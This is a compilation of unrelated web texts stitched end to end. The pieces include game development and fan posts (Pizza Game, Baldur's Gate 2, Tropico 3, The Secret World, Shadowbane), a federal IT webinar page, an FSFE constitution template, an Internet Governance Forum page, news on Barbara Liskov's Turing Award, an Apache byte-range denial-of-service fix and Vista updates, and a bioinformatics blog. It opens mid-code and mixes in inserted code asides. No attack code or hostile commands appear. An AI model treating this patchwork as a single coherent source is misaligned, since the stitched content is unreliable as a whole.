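        self.walls.add(((row, col), side))

    def set_floor(self, row, col, texture):
        self.floor[row][col] = texture

lot = TileMap(8, 8)
lot.set_floor(2, 2, "kitchen_tile")
lot.place_wall(2, 2, "N")
lot.place_wall(2, 2, "W")
print(len(lot.walls), "wall segments placed")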
The game will provide you, the player, with a free camera. What does this mean? Well, you'll be able to place the camera wherever you want in the restaurant. For example, in screenshot 3 you can see that the camera is zoomed out.
Screenshot 4 and Screenshot 5 show two different views of the restaurant from "inside" and at ground level.
Be sure to keep in mind that this is a very, very early look at the game. However, we figured that it would be a good idea to show everyone what we've been up to.
The general game design for Pizza Game has been pretty much finalized and we have begun work on the technical design of the game. An object design using UML has begun to take shape and we've been slowly working through technical issues that we need to address in the design. What's taking us so long you might ask? Well, even seemingly "simple" technical issues can often become troublesome if we try to create a design that is both robust and flexible. We are, nevertheless, making excellent progress. But whatever anyone might tell you, or what you may believe - creating a game is not easy.
Welcome to the Pizza Game Website
Born out of the Pizza Business Project, Pizza Game takes the concepts and ideas introduced in Pizza Business to the next level. Whereas Pizza Business is a text-based, turn-based, non-graphical pizza restaurant management game, Pizza Game will be a modern, 3D, real-time game. The game right now has no official title; therefore, we have chosen to call it "Pizza Game" until we can come up with an appropriate name.
Pizza Game has actually been in a conceptual development phase for about two months. Over the next few weeks, we hope to start finalizing a game design and begin working on the technical aspects of the game. You can check up on the progress of the game through news posts on this website, through articles related to the development of the game that we will write, and through the forums. Please join the forums and lend your voices, suggestions, and ideas to the development of Pizza Game and be sure to check back here often: development on the game should soon shift into high gear.
Baldur's Gate 2
grandpa68
Loc: Antelope Valley, So CA, USA
I have set up a trade for this game from GTZ but I have some questions about it first. Will it work on Windows XP? How is it different from Baldur's Gate that I am playing now? Do I need any patches for this game?
Keep smiling and the world will smile with you.
Re: Baldur's Gate 2
Yes, BG2 will work in WinXP. [I know this because I'm playing it right now on WinXP.] Luckily, there is an update function on the launch screen. You just need to click on the BG2 icon, and then choose update. Or you can download the latest patches from BioWare's site. [I think you need to go through their support page.] BG2 (and Throne of Bhaal) is NOT that different from BG1. There is some technical stuff which is made easier. Travelling now rests your party, like sleeping does. (In the game's options menu there is an option to select 'rest until healed'.) Also, try to get both BG2 + Throne of Bhaal. [Sometimes you can get them in a nice package together; I also think you can get a DVD version of BG2 + Throne of Bhaal.]
Adventure gaming is fun
Well, there are lots of things that are different, but much is the same. A few technical changes, better graphics, some more functions (such as casting healing spells automatically before resting), more spells and more options in general. What differs most is the atmosphere and feel of the game itself. Baldur's Gate 2 has a rich storyline, wonderful characters (lots of banter), but is much more "concentrated" than Baldur's Gate was. Far fewer areas to explore, but more closely packed with quests and adventures. I strongly suggest you don't even start the game till you have finished Baldur's Gate, since it will be a huge spoiler. Glad to see another fall before the might of Baldur's Gate. Still the best RPG out there if you ask me.
Drizzt
You couldn't see that one coming, could you?
I forgot to mention that you can export your character (or party?) from BG1 to be used in BG2. Very nice feature, imo. I agree with Drizzt. You really should finish BG1 before playing BG2 --- for obvious reasons, too many spoilers...
Yeah. And make sure you keep those pantaloons from the Friendly Arm if you do import your character. The only annoying thing is that Baldur's Gate 1 does not allow for sub-classes, which means that if you started playing a certain class in BG1, you won't be able to access the new classes in BG2 if you import it.
Quote: Originally posted by Drizzt: "You couldn't see that one coming, could you?"
Hehheh, and Drizzt SCORES!
lindy236
Loc: South Dakota
I just finished BG1 and am now starting BG2. How do I export my character from BG1 to BG2? I really need step-by-step directions. Thanks, Linda
I can't remember the exact process off the top of my head, but I think there is a folder in the BG2 folder named "char". BG and BG2 use the same character system, so it's the same file types. When you finish the game, it makes a "final save" that saves everything with the XP you gained for killing Sarevok. This "final save" is a folder called e.g. "00038383-Final Save" or something in the BG1 folder called "saves". Copy that folder to your BG2 "saves" folder. Then from the character creation menu, choose "import" and then "from saved game". This will allow you to do so. You can of course also "export" a character from a BG save game. To do so, go to the character screen and then choose "export". This will save the PC as a .chr file in the BG1 "char" folder. Then simply copy that .chr file into the BG2 "char" folder and import it from there. Sorry if this is a mess... I'll look into it more closely when I get home today. Need to go pretty soon, but I hope it will work anyway.
Drizzt, I recently took a BG 1 character into BG 2, and I think the first method did not work for me for some reason, but the second one did -- i.e. the Export character option, and then moving the character folder into BG 2. For those of you that haven't played BG 2 before -- you're in for a great ride. BG 2 is one of the best games ever made. Here's just a little hint of what's to come... if a party member of the opposite gender starts being really nice, try being nice to them back, and see where it leads. The party member interactions in BG 2 are second to none. Enjoy!
Second to Ps:T, actually. As much as I adore BG, nothing beats that game in terms of character depth and interactions... Hagatha, I tried it now and it worked for me. Those 10,000 XPs for Sarevok can be quite handy. What you need to do is as I said:
1. Go into your BG/Save folder. Look for the folder called "(A number)-Final Save" and copy this into BG2/save.
2. Go to character creation and choose import, then "Saved game" and then "Final Save", which will let you import your PC from that game.
Good luck!
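(Note added outside the original thread: for anyone who wants to script the copy step above, here is a rough Python sketch. The install paths are made up; adjust them to wherever BG1 and BG2 actually live on your machine.)

```python
# Rough sketch of the manual steps above (hypothetical paths).
import shutil
from pathlib import Path

bg1_saves = Path(r"C:\Games\Baldur's Gate\save")
bg2_saves = Path(r"C:\Games\Baldur's Gate II\save")

# Copy every "...-Final Save" folder from the BG1 saves into the BG2 saves,
# so it can be picked via Import -> "from saved game" at character creation.
for folder in bg1_saves.glob("*Final Save*"):
    shutil.copytree(folder, bg2_saves / folder.name, dirs_exist_ok=True)
```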
Thanks for the info. I gave it a try and it worked. Now I'm not sure if I want to continue with my character or create a new one. Thanks again.
The one advantage to keeping your existing character is that he or she has read all those books that gave them permanent stat increases in BG1. However, the wide range of character classes in BG 2 is a lot of fun to play with. If you've just had a plain fighter all the way through BG1, in BG 2 you can now dual-class them, although as usual I would caution against doing that until your fighter has grand mastery of one weapon. But if you have the TOB expansion, you'll get up to about level 35-40 depending on your character class, so dual-classing can give you a very interesting and powerful character.
Dual-classing as a Kensai-Mage makes you almost ridiculously powerful. But it's fun.
Tropico 3 gets a new website
The official website for Tropico 3 is now online and waiting to dish information on the upcoming dictator simulator. The site features the usual array of community forums, screenshots, and videos. I'm disappointed there's not a developer diary told from the perspective of the dictator, but that's just me.
INFORMATION WILL NOT BE WITHHELD AS
THE OFFICIAL TROPICO 3 WEBSITE GOES LIVE
BALTIMORE, MD, September 22, 2009 – In the interest of full disclosure, El Presidente and Kalypso Media today removed the constraints of the limited Tropico 3 teaser site and launched the full-featured official game site. No longer will those interested in the banana republic be deprived of new information and assets, as the new official site has made all general information, screenshots, trailers and demo available in one easy-to-access location.
Developed by Haemimont Games, Tropico 3 brings the series back to its roots and puts players in the role of ‘El Presidente’, the two-bit dictator of a strategically positioned banana republic in the Caribbean during the time of the Cold War. Players assume control of every aspect of island life, deciding whether to unleash the army to secure their power base or lead their people to prosperity as a generous elder statesman. Will absolute power corrupt, or will the humanitarian approach spur progress? Find out this October as gamers become part of the political machinations of Tropico as they determine the fate of this island nation.
TROPICO 3 is being developed by Haemimont Games and will be available for PC on October 20, 2009 and on the Xbox 360 in early 2010. For more information, screenshots and videos please visit the official game website www.tropico3.com
About Kalypso Media
Specializing in the publishing of interactive media, primarily computer games, Kalypso Media was founded in summer 2006 by industry veterans Simon Hellwig and Stefan Marcinek. The following year, a sister company, Kalypso Media UK Ltd., was established in England and is currently led by Andrew Johnson and Charlie Barrett, two experienced members of the Kalypso Media Group management team. In 2009, Kalypso Media USA Inc. was established under the leadership of veteran video game executive, Deborah Tillett. Kalypso Media owns two development studios, Realmforge Studios GmbH and Gaming Minds Studios GmbH, both of which are located in Germany. For further information see www.kalypsomedia.com.
About Haemimont Games
Haemimont Games is an independent games development team brought together by a common passion: to thrill, engage and provoke gamers worldwide. Since 1997, the studio has developed eight original titles with numerous add-ons. It is currently working on Tropico 3 among others. More information on the company can be found by visiting www.haemimontgames.com. | 计算机 |
MeriTalk - Where America Talks Government
Mobile Work
August 23, 2012, 1 p.m. ET
CPE Credits:
Webinar attendees are eligible to receive continuing professional education (CPE) credits. Click Here for more details.
For more information, please contact us at [email protected]
The Customer is Always Right Webinar
With a pile of mandates, unprecedented data growth, and shrinking budgets, Federal IT has change ahead. What do the customers think? MeriTalk's 2012 "The Customer is Always Right" study for the first time asks IT's customers, Federal executives, how they view IT, how they leverage IT, and how their agencies are doing. On August 23, attendees learned:
Who are the top-ranked IT performers in Federal government, according to Fed execs?
What do Federal executives really want from IT?
How can your agency save with IT modernization/transformation? Do Federal executives see opportunity in data center consolidation, cloud computing, and Big Data? What steps are agencies taking to best support their customer's missions?
Featured speakers included:
Nicole Burdette, MeriTalk Fellow [moderator]
Brad Johnson, Director, EMC Consulting for Public Sector
Nitin Pradhan, Chief Information Officer (CIO), U.S. Department of Transportation
Nitin Pradhan
Mr. Nitin Pradhan was sworn in on July 6, 2009, as the Chief Information Officer for the U. S. Department of Transportation (DOT) as part of the Obama Administration. He is the Chief Advisor to Secretary Ray LaHood in all matters relating to information technology (IT). Pradhan provides IT vision, strategy, planning, policy, and oversight for DOT's $3 billion-plus IT portfolio. Pradhan is a business strategist, technology expert, coalition builder, and change agent with more than 20 years experience, including 11 years at the CXO level in government, startups, nonprofits, and private industry. His expertise is targeting new opportunities utilizing technology as a solution; advising operational managers in launching and promoting knowledge-centric products and services; and defining fundamental organizational transformation integrating entrepreneurship, innovation and technology, as well as institutional and partner knowledge. His focus is on Enterprise 2.0-based communications; collaboration and community-building; and information assurance, security, and privacy. Pradhan is also a strong proponent of building public-private partnerships. He was recently named to Information Week's "Government CIO 50: Driving Change in the Public Sector" for bringing a business person's point of view to management of DOT's IT strategy, policy, and implementation.
Prior to joining DOT, Pradhan was an IT executive at Fairfax County Public Schools, the 12th largest school district in the country. The district's IT department has been ranked in CIO Magazine's top 100 IT organizations and Computerworld's 100 best places to work in the nation. Before his time in Fairfax, Pradhan was the managing director of Virginia's Center for Innovation Technology, where his focus was on mentoring and growing technology startups and building research and innovation capabilities and capacity. He was also the co-founder and interim CEO of a wireless startup. Pradhan's educational qualifications include a Bachelor of Science in engineering and a Master of Business Administration in marketing from India, as well as a Master of Science in accounting from the Kogod College of Business at American University in Washington, DC.
Please complete the form below to view the archived webinar:
The Customer is Always Right Webinar attendees are eligible to receive continuing professional education (CPE) credits. Attendees can earn a maximum of 1 CPE credit in computer science. Additional details:
Delivery Method: Group Internet Based
Program Level: Intermediate
Prerequisites: No prerequisites required
Advance Preparation: No advance preparation necessary
Contact Whitney Hewson at [email protected] for details on obtaining CPE credits at The Customer is Always Right Webinar.
This event is a complimentary event. As such, refunds do not apply. For more information regarding our program cancellation policy or complaint resolution policy, contact Whitney Hewson at [email protected].
MeriTalk is registered with the National Association of State Boards of Accountancy (NASBA) as a sponsor of continuing professional education on the National Registry of CPE Sponsors. State boards of accountancy have final authority on the acceptance of individual courses for CPE credit. Complaints regarding registered sponsors may be submitted to the National Registry of CPE Sponsors through its website: www.learningmarket.org.
Constitution
Preamble
Upon entering the digital age, in which real and virtual space will equally determine the social, cultural and scientific development of mankind, the Free Software Foundation Europe has the long-term goal to raise and work on the questions this will necessarily raise. In this regard the direct function is the unselfish promotion of Free Software as well as creating and propagating the awareness of the related philosophical and social questions. As its acknowledged sister organisation, the FSF Europe will join forces with the Free Software Foundation founded by Richard M. Stallman in the United States of America. The latter, a recognised tax-exempt charitable organisation in the USA, has been dedicating itself since 1984 to the promotion and distribution of Free Software and in particular the GNU System, a Unix-like operating system. This system is mostly known by one of its variants, GNU/Linux, which since 1993 has been used successfully on many computers.
The term Free Software in the sense of the FSF Europe does not refer to the price, but rather to the following four freedoms:
- the freedom to use a program for any purpose,
- the freedom to study the program and adapt it to your own needs,
- the freedom to make copies for others,
- the freedom to improve a program and make these improvements available to others, so that the whole community benefits.
This definition of Free Software goes back to the idea of freely exchanging knowledge and ideas that can traditionally be found in scientific fields. Like thoughts, software is non-tangible and duplicable without loss. Passing it on feeds an evolutionary process, advancing thoughts and software. Only Free Software preserves the possibility to comprehend and build upon scientific results. For scientists, it is the only kind of software which corresponds to the ideals of a free science. Accordingly, the promotion of Free Software is also a promotion of science.
The distribution of information and the forming of an opinion are done increasingly by digital media, and the trend is to foster the use of those means for direct citizen participation in democracy. Therefore, a central task of the FSF Europe is to train proficient citizens in these media, thereby promoting democracy. Digital space (``Cyberspace''), with software as its medium and its language, has an enormous potential for the promotion of all mental and cultural aspects of mankind. By making it commonly available and opening up the medium, Free Software grants equal chances and protection of privacy.
Coining the awareness for the problems related to the digital age in all parts of society is a long-term goal and a core aspect of the work of the FSF Europe. Therefore the FSF Europe will seek to increase the use of Free Software in schools and universities in order to parallelise the education in real space matters with the creation of understanding and awareness of problems in virtual space. Free Software guarantees traceable results and decision-making processes in science and public life as well as the individual rights to free development of personality and liberty of opinion. It is the job of the FSF Europe to carry Free Software into all areas that touch public life or ``informational human rights'' of citizens.
Name, seat, financial year
(1) The association bears the name ``Free Software Foundation Europe - Chapter (Name of State)'', from now on referred to as ``Chapter (Name of State)''. Additionally the name ``(Name in local language)'' can be borne. It is to be registered into the register of associations; after the registration it carries the suffix ``e.V.'' (if necessary).
(2) The association has its seat in (Name of City).
(3) The financial year is the calendar year.
Purpose, tasks, non-profit character
(1) The purpose of the ``Chapter (Name of State)'' is the promotion of Free Software in order to further the free exchange of knowledge, equal chances of accessing software, and public education with regard to the principles outlined in the preamble.
(2) The goals of the ``Chapter (Name of State)'' are namely to be achieved by:
- the ideal support of governmental and private organisations in all aspects of Free Software,
- the cooperation and coordination with the FSF Europe, which pursues the same publicly-spirited goals,
- the support of programmers developing Free Software and so realizing the public
Internet Governance Forum (IGF)
As one outcome of the United Nations World Summit on the Information Society and
following up on its Working Group on Internet
Governance (WGIG), the November 2005 summit in Tunis decided to
establish the United Nations Internet Governance Forum (IGF).
It is important to understand that the IGF is not a decision-making
body, but has been established as a policy dialogue forum with strong
claims to multi-stakeholder involvement and participation. Its mandate
is set out in paragraph 72 of the Tunis Agenda of the WSIS:
72. We ask the UN Secretary-General, in an open and inclusive process, to convene, by the second quarter of 2006, a meeting of the new forum for multi-stakeholder policy dialogue -- called the Internet Governance Forum (IGF). The mandate of the Forum is to:
- Discuss public policy issues related to key elements of Internet governance in order to foster the sustainability, robustness, security, stability and development of the Internet;
- Facilitate discourse between bodies dealing with different cross-cutting international public policies regarding the Internet and discuss issues that do not fall within the scope of any existing body;
- Interface with appropriate inter-governmental organizations and other institutions on matters under their purview;
- Facilitate the exchange of information and best practices, and in this regard make full use of the expertise of the academic, scientific and technical communities;
- Advise all stakeholders in proposing ways and means to accelerate the availability and affordability of the Internet in the developing world;
- Strengthen and enhance the engagement of stakeholders in existing and/or future Internet governance mechanisms, particularly those from developing countries;
- Identify emerging issues, bring them to the attention of the relevant bodies and the general public, and, where appropriate, make recommendations;
- Contribute to capacity building for Internet governance in developing countries, drawing fully on local sources of knowledge and expertise;
- Promote and assess, on an ongoing basis, the embodiment of WSIS principles in Internet governance processes;
- Discuss, inter alia, issues relating to critical Internet resources;
- Help to find solutions to the issues arising from the use and misuse of the Internet, of particular concern to everyday users;
- Publish its proceedings.
So it cannot make policy itself, but national and international
policies may follow from its work. But given that people are pushing
for the IGF to tackle issues such as Spam, Cybercrime, Copyrights,
Patents, Trademarks and such, following the IGF makes sure that the
Free Software community will not be surprised by policies that would
contribute to monopolisation of the internet, and to maintain the
freedom of users, developers and companies on the internet.
The Internet Governance Forum is a yearly meeting, held in
different countries, and open to participation by governments, private
sector and civil society.
2006: The Inaugural Meeting of the IGF has taken place in Athens, Greece on 30 October - 2 November.
2007: The 2007 IGF will be held in Rio de Janeiro, Brazil
Dynamic Coalitions
Most of the substantial discussion at the IGF takes place in the
Dynamic Coalitions, which are formed ad-hoc at the IGF, and work in an
open multi-stakeholder approach. These are the Dynamic Coalitions that
FSFE is involved in:
Dynamic Coalition on Open Standards
Dynamic Coalition on Access to Knowledge (A2K) and Freedom of Expression
Sovereign Software: Open Standards, Free Software, and the Internet - FSFE contribution by its president Georg Greve to the first meeting of the Internet Governance Forum.
Official web site of the IGF:
http://www.intgovforum.org
Points and Counterpoints on The Secret World
So the big Celebration Weekend is over. A lot of people who hadn't had a chance to sample The Secret World got their chance, and while not everyone was satisfied, I'm sure Funcom picked up quite a few new acolytes. Kadomi gushes enthusiastically about the game; the themes appealed to her: Lovecraftian horror, LGBT-friendly (I would say neutral, or matter-of-fact). She concludes with this:
I have to say, this was the first MMO since WoW that totally made me forget the time. When my SO told me it was time to do groceries after I sat down to play it at noon, and it was miraculously 6 pm, I was boggling.
Psynister and Fynralyl were, shall we say, less enthusiastic. They bring up valid points, but much of their concern is over stylistic choices made by Ragnar Tornquist and his team rather than (what I perceive as) flaws in the game itself. Since that is a matter of taste, there is not too much I could say that would change their minds. And that is perfectly OK. The Secret World is not a game for everyone; just the setting, our own modern world with supernatural horrors, is a turn-off for many, and that is before you even get into the mechanics of the game.
Dark and Profane
Fyn, in particular, was not fond of the dark "hyper-realistic" art style of the game. I put that in quotes because while I think that was the goal, we all have a long way to go before fully interactive video games can have the realism of Hollywood CGI. I've mentioned it before, but the uncanny valley that many of the characters live in just adds to the creepiness of the game for me. That said, I myself am looking forward to spending time in the far more pleasant climes of Guild Wars 2.
The lack of PC interaction in the cutscenes was also mentioned, something particularly noticeable to someone coming directly from SWTOR's conversation wheels. In TSW, the NPCs actually make mention of the PC's reticence. I personally feel this frees me up for RP. My Templar is German; my Iluminata, Texan; and my Dragon, Japanese. The addition of whatever voices the devs decided to use would force me to alter my conception of these characters. Perhaps not as big a deal in SWTOR, though eventually the spoken dialogue of my characters there becomes grating sometimes, when they don't say exactly what I thought they should say. So it's a stylistic choice some people will like and others won't.
The prominent profanity laced through the game is a major turn-off for many. Both Psyn and Fyn found it not only gratuitous, but Fyn said, "It also reminded me of a kid trying too hard to be 'cool'." This is an honest critique; unfortunately, the use of profanity is more widespread than some would like in the Real World, too. Sad to say, I work in an environment where that sort of language is common. I am guilty of using it myself, because it is pervasive. Sctrz doesn't like it at all; she skipped through the junkman's cutscenes completely.
Creation and Progression
Fyn also didn't like the limitation of three character slots per account. Actually, she referred to this issue as her deal breaker. [EDIT] Extra slots are available from your account page on the TSW website. Details below, thanks to Eric. [/EDIT] Fyn realized that there was a slot for each faction, and with every character capable of learning every skill and ability eventually, that may be all that's necessary for most people. But she likes to play alts in order to relax at different levels of the game, so for her three slots simply isn't enough. I am playing three alts and therefore repeating a fair amount of content, as well as progressing more slowly through it than Belghast, MMO Gamer Chick, and others. I don't need to play more, because of the classless thing; and you can see from my character pages, Dear Reader, that I am normally an unrepentant altoholic.
Both Fyn and Psyn had issues with the no-levels aspect of the game. Psyn really hit the nail on the head with his section title "Leveling Without Levels." Let's put a stop to the lie that there isn't character stat progression in TSW. As Psyn correctly pointed out, if there were no levels in the game, a newbie straight out of the tutorial should be able to walk into Transylvania (the last of the zones) and have a decent chance of survival. This is not the case. What TSW doesn't have is discrete levels and a specific signal (The GLOW) that says, "You are now better/stronger/faster than a second ago."
Character progression in terms of stats is done through the purchase of Skills. Since you can spend Skill points however you choose, there is plenty of room to screw it up. Fyn mentioned that she didn't like having to devote skill points to talisman skills in order to wear higher quality talismans. She wanted to spend them all on weapons. What she may not have realized is that the Talisman Skills are also where you improve your characters' basic hit points, as well as their resistance to physical and magical damage. Also, each weapon has two skill paths, but it is only necessary to fill in one path to wield higher quality weapons. On my toons, I have taken to filling all the talismans and the two weapons I wield in a balanced way: the Major Talisman Skill first as it boosts HP, then the weapons, and finally the other talismans. But there's nothing that says you have to do this.
In a related vein, Psyn and Fyn both disliked the inability to easily see the relative strength of their opponents; however, as was pointed out in a comment on Psyn's review, the mobs do have an indicator of their strength; it's just not a number. I personally look at the mob's HP and make a judgement call on whether I think I can whittle it down before I am dead myself. I do get in over my head.
Neither Here Nor There
The questing system of The Secret World is designed to slow you down to "savor" each quest as you're doing it, limiting your current list to one phase of the overarching story, one main/investigation/sabotage quest, one "dungeon" quest, and three side quests. Attempting to pick up any further quests will result in pausing the current quest of that type (or one of the three). You can't run around and pick up all the quests. Part of the reason for this is that many of the quests, even the side ones, involve a bit of thought, and maybe some research on the internet.
TSW has a built in web browser to assist in these quests. Neither Fyn nor Psyn mentioned the need for outside research in their reviews, but it's something I've noticed others saying. This is a love-or-hate aspect of the game. TSW is almost an Alternate Reality Game, and as such, the devs have peppered the internet with sites and pages that help with the quests, or at the very least, they have researched commonly used sites like Wikipedia to help build their mysteries. And this is beyond the thorough research they did on the environment itself.
I also can't speak to the complaint that the quests send you all over the map, since I neither saw the paths that Psyn and Fyn took, nor can I gauge their tolerance levels for wandering. I personally don't think there's too much, the quests I pick up seem to flow fairly well together, and I make note of where things are so I can return when my current task is done. This is ultimately another matter of taste.
The story of what is going on in The Secret World starts with the videos you encounter at the very beginning of the character creation process. Psynister decided to skip the videos since he was going to roll one of each faction anyway. This is the first time I'll actually say he made a mistake. Those videos, and the quest cutscenes, and the conversations with main NPCs, are integral to understanding what is going on here. Psyn goes further in saying, "I don't think they did a very good job of actually telling you what the story is." I feel the information is there, but you have to seek it out.
There are two ways of telling a mystery story. One is to let the audience know who the perpetrator of the crime is right off the bat, and then let them follow the investigators as they unravel the mystery. The other is to leave the audience in the dark, as well, allowing them to figure out the mystery. The Secret World is of the second type. You don't start out with a ton of information other than what's given to you through the dialogue. As you progress through the quests, you find out more about not only the main mystery, but the secret world in general. I actually found this very similar to playing vanilla WoW so many years ago, not there is a ton of mystery in WoW, but there is a rich world to discover.
A Swing and a Miss
Psynister would also like the capabilities of the different weapon types spelled out in more detail. Now, when you first open both Skills and Abilities, a video automatically starts playing which explains the basics. These abilities are accessible at any time from the help button in their respective interfaces. The only thing I can say beyond that is The Secret World refuses to hold your hand. Prepare to be challenged. The specifications of every ability in the game are available from the Ability Wheel interface, including suggested decks that mention their purpose or role in a group: Tank, DPS, or Healer. The Skill paths for each weapon are also based on the potential role of that weapon. For example, Blood has both a healing path and a DPS path. But you have to look at the interface to see it. I can't remember everything it says, but I am curious: since Psyn skipped the faction videos, did he also skip the Skill and Ability tutorials?
I can understand the eagerness to just get the game going already, and I think Guild Wars 2 is a great example of getting you involved in gameplay right away, progression details can come later. TSW doesn't, other than the quick subway disaster tutorial. And even then, I can see how it may give a mistaken impression of the shotgun abilities. However, I am a strong fan of so-called exploratory learning. I am far more adept with Windows and MS Office than the vast majority of my coworkers, simply because I either have played around with the programs so much, or am willing to go to the help file to find a solution to an issue. I found TSW to be the same way. I can explore both the world environment and the UI to my heart's content. For those of you still reading and interested in playing I highly recommend this Deck Builder.
TL;DR: Different Strokes
Only so many character slots, only so many quests at a time, only so many active and passive abilities in any given fight. Using limitations, TSW forces you to focus and plan. Take the time to really look around and listen to the NPCs. Explore your Abilities to figure what goes best with what based on your own playstyle. Explore the world both for XP and to find Lore objects. I've "wasted" several hours on my characters just exploring the safe Faction capitals looking for Lore. I loved it.
Neither Psyn nor Fyn are dummies. On the contrary, they are both intelligent, thoughtful people, with whom I am glad to share an online friendship, which I hope continues after this post. :) Their posts are insightful impressions of TSW for people coming to the game "blind." I'm sorry I wasn't available to answer questions they had during gameplay; recommending healing weapons, for instance. Ultimately, it would not have made much difference. Stylistically, the game is not their cuppa tea. This game serves a niche, much like EVE. It's not for everyone, but I am glad people have had a chance to play and decide for themselves whether the game is for them. Hey guys, I'll see you in GW2!
Funcom, Game Mechanics, MMOs, Impressions
Barbara Liskov wins Turing award
Professor Liskov is the second woman to be awarded the prize
The 2009 A. M. Turing Award has gone to Barbara Liskov for her contributions to programming.
Professor Liskov was the first US woman to be awarded a PhD in computing, and her innovations can be found in every modern programming language.
She currently heads the Programming Methodology Group at the Massachusetts Institute of Technology.
The award, often referred to as the "Nobel Prize for computing", includes a $250,000 (£180,000) purse.
Professor Liskov's design innovations have, over the decades, made software more reliable and easier to maintain.
She has invented two computer programming languages: CLU, a forerunner of modern object-oriented ones, and Argus, a distributed programming language.
Liskov's groundbreaking research underpins virtually every modern computer application, forming the basis of modern programming languages such as Java, C# and C++.
One of the biggest impacts of her work came from her contributions to the use of data abstraction, a method for organising complex programs.
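(Illustration added for context, not from the BBC article: data abstraction means client code uses a type only through its operations, so the hidden representation can change without breaking callers. The Python sketch below is hypothetical.)

```python
# Hypothetical example of data abstraction: callers use push/pop/peek only,
# so the internal representation (a Python list here) could be swapped for
# something else without changing any code that uses the Stack type.

class Stack:
    def __init__(self):
        self._items = []          # hidden representation

    def push(self, value):
        self._items.append(value)

    def pop(self):
        return self._items.pop()

    def peek(self):
        return self._items[-1]

s = Stack()
s.push(1)
s.push(2)
print(s.pop())   # 2 -- the caller never touches the list directly
```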
The prize, named after British mathematician Alan Turing, is awarded annually by the Association for Computing Machinery.
ACM president Professor Dame Wendy Hall said of Liskov: "Her elegant solutions have enriched the research community, but they have also had a practical effect as well.
"They have led to the design and construction of real products that are more reliable than were believed practical not long ago," she added.
Professor Liskov will be presented with the award in June.
Another Apache update due to byte range flaw
The Apache Foundation has announced that the newly released version 2.2.21 of its free web server is essentially a bug fix and security release. In particular, the developers focused on the vulnerability that makes servers susceptible to Denial-of-Service (DoS) attacks. The new version corrects and complements the first fix, which was released only two weeks ago. It corrects an incompatibility with the HTTP definition and changes the interpretation of the MaxRange directive. It also fixes flaws in mod_proxy_ajp, a module that provides support for the Apache JServ protocol. Users are advised to update their Apache installations as soon as possible. However, those who use Apache 2.0 will still need to wait: corrections for this version are scheduled to be incorporated in the release of version 2.0.65 in the near future. Those who use version 1.3 are not affected by the byte range bug. The Apache developers explain the background of the byte range vulnerability in an online document. There, they also describe various options for protecting servers against DoS attacks that exploit this vulnerability. The document also mentions a ticket on the byte range topic issued by the IETF, which is responsible for the HTTP standard. In this document, the IETF says that the protocol itself is vulnerable to DoS attacks, because of, for instance, the potential presence of many small or overlapping byte range requests. Changes to RFC 2616 are planned in order to correct this. The IETF stipulates that clients must no longer send overlapping byte ranges, and that servers may coalesce such overlapping ranges into a single range. Ranges within a request must be separated by a gap that is greater than 80 bytes, and they must be listed in ascending order, said the IETF.
(djwm)
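(Editorial illustration, not part of the original article: a minimal Python sketch of the coalescing behaviour the IETF describes, merging overlapping or nearly adjacent byte ranges into a single range. The 80-byte threshold comes from the article; everything else is an assumption.)

```python
# Rough sketch (not Apache's actual code): coalesce HTTP Range spans so that
# overlapping or nearly adjacent ranges (gap within ~80 bytes) become one.

def coalesce_ranges(ranges, min_gap=80):
    """ranges: list of (start, end) byte offsets, end inclusive."""
    merged = []
    for start, end in sorted(ranges):
        if merged and start <= merged[-1][1] + min_gap:
            # Overlaps or sits within the minimum gap: extend the previous range.
            merged[-1] = (merged[-1][0], max(merged[-1][1], end))
        else:
            merged.append((start, end))
    return merged

# Example: the overlapping spans an attacker might send collapse to one range.
print(coalesce_ranges([(0, 499), (100, 599), (50, 49999)]))  # [(0, 49999)]
```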
E3: Updated Shadowbane Information
At a demonstration of Shadowbane at the Ubi Soft booth, some new information about the game was revealed. For starters, a release this year will definitely be happening - either during Q3 or Q4. No summer release will occur, but Wolfpack and Ubi have re-opened signups for the Shadowbane open beta test, to begin at the end of June. The current goal is to have between 2000 and 2500 players logged onto each server at one time. One core design facet - the ability to travel between servers - is still being discussed, though it is strongly hoped that it will be in the game at some point. Wolfpack also performed a slight graphical upgrade in time for the show, and all core graphical effects, with the exception of lighting effects, are currently in the E3 build. The story was also a major focus, and it was mentioned that it is hoped that different servers will be able to shape the ongoing storyline in different ways to accommodate the actions of the players. It is also hoped that Shadowbane's developers will be dramatically altering the face of the game as it progresses - one example given was the total destruction of a particular class, preventing any new characters of that class from being created. In such a case, the existing characters would be the only remnants of that class, and it would be possible to be the last character of that type. More information about Shadowbane will be posted in the future, but Wolfpack has major plans for the game, and it will be interesting to see how well they can pull it off.
Official Shadowbane Website
Updated: 05.23.02 - 7:46 PM
Tortolia
Why are Vista updates not on Windows Update?
Operating systems: Enhancements are available for download elsewhere
We reported on the reluctant emergence of new updates to improve the stability and reliability of Windows Vista yesterday. But what we didn't realise was that the updates don't appear to feature on the Windows Update website. Nor are they automatically downloading to users' machines.
The updates haven't been officially announced by Microsoft. There hasn't even been any comment about them on the Windows Vista Team Blog. And usually the slightest squeak of activity is trumpeted there.
Web speculation has suggested the updates could have been made available in advance of Microsoft's regular monthly patch release date, Patch Tuesday. This is slated for next week. It's unlikely the updates are anything to do with Windows Vista Service Pack 1 which will rear its head before the end of the year. "There will be a Windows Vista Service pack but it's too early to discuss specifics on timing," said a Microsoft spokesperson last month. "The team is working hard on the service pack, and our current expectation is that a Beta will be made available sometime this year." | 计算机 |
Thanks for visiting my blog - I have now moved to a new location at Nature Networks. Url: http://blogs.nature.com/fejes - Please come visit my blog there.
new repository of second generation software
I finally have a good resource for locating second-gen (next-gen) sequencing analysis software. For a long time, people have just been collecting it on a single thread in the bioinformatics section of the SeqAnswers.com forum; however, the brilliant people at SeqAnswers have spawned off a wiki for it, with an easy-to-use form. I highly recommend you check it out, and possibly even add your own package.
http://seqanswers.com/wiki/SEQanswers
Labels: Algorithms, Aligners, application development, assembly, Bioinformatics, Chip-Seq, documentation, new technology, programming, Sequencing, short-reads, SNP calling, Software
posted by Anthony Fejes at 8/18/2009 03:30:00 PM 0 Comments
Complete Genomics, part 2
Ok, I couldn't resist - I visited the Complete Genomics "open house" today... twice. As a big fan of start-up companies, and an avid follower of the 2nd gen (and possibly now 3rd gen) sequencing, it's not every day that I get the chance to talk to the people who are working on the bleeding edge of the field.
